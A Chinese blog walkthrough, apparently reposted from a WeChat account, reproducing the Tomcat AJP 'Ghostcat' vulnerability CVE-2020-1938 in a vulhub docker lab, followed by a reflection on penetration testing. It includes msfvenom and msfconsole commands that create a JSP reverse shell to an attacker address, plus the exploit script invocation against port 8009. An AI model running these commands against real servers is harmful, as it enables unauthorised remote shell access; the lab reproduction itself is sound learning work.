一、环境搭建
机器:kali Linux
Java:jdk11
python:2.7.x
漏洞复现情景:https://github.com/vulhub/vulhub
二、用docker开启漏洞环境
笔者这里是修改了端口,一开始开启环境是默认端口应为8080
用docker-compose开启环境前,先安装docker和docker-compose
docker部署链接:
https://blog.csdn.net/m0_67844671/article/details/132872790
三、下载脚本
脚本下载地址:
https://github.com/fairyming/CVE-2020-1938
四、查看脚本用法
五、尝试利用脚本文件包含
六、利用msfvenom生成木马
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.217.128 LPORT=4444 R > muma.txt
七、利用docker复制木马进去容器内部模拟文件上传成功
docker cp muma.txt 188fb6f53492:/usr/local/tomcat/webapps/ROOT/muma.txt
上传成功如下图所示:
八、利用msfconsole开启监听
handler -p java/jsp_shell_reverse_tcp -H 0.0.0.0 -P 4444
九、利用脚本getshell
python2 CVE-2020-1938.py 192.168.217.128 -p 8009 -f /muma.txt -c 1
十、回到msfconsole查看是否有会话
如上图所示即反弹shell成功!
在进行渗透测试的过程中,我深刻体验到了网络安全领域的挑战和重要性。渗透测试是一项关键的活动,旨在评估系统、应用程序或网络的安全性,以及揭示其中存在的潜在漏洞。通过这次经历,我对网络安全的复杂性和不断演变的威胁有了更深刻的理解。
首先,渗透测试不仅仅是一项技术活动,更是一项需要不断学习和更新知识的任务。随着黑客技术的不断进步,安全专业人员需要保持对新威胁和漏洞的敏感性,并采取相应的防御措施。在这个过程中,我深感信息安全是一个日益紧迫的领域,需要持续不断地提高自身的技能水平。
其次,渗透测试让我更加了解攻击者可能采用的各种手段,包括利用软件漏洞、社会工程学和网络协议的不当使用。这种全面的了解不仅对于测试者在渗透测试中的角色至关重要,也有助于组织建立更加全面的安全策略,以防范潜在威胁。
在进行博客写作时,我感到分享这一经历对于推动网络安全意识的提升至关重要。通过将自己的经验分享给社区,我能够为其他安全从业者提供有价值的见解,并鼓励更多人投身于保护网络安全的事业。
总的来说,渗透测试是一个不断学习、挑战自我的过程,对于构建更加安全的数字世界发挥着至关重要的作用。通过这次体验,我深信投身网络安全领域是一个充满挑战但也充满乐趣的选择,而我的学习之旅还远未结束。
原文始发于微信公众号(黄公子学安全):CVE-2020-1938漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论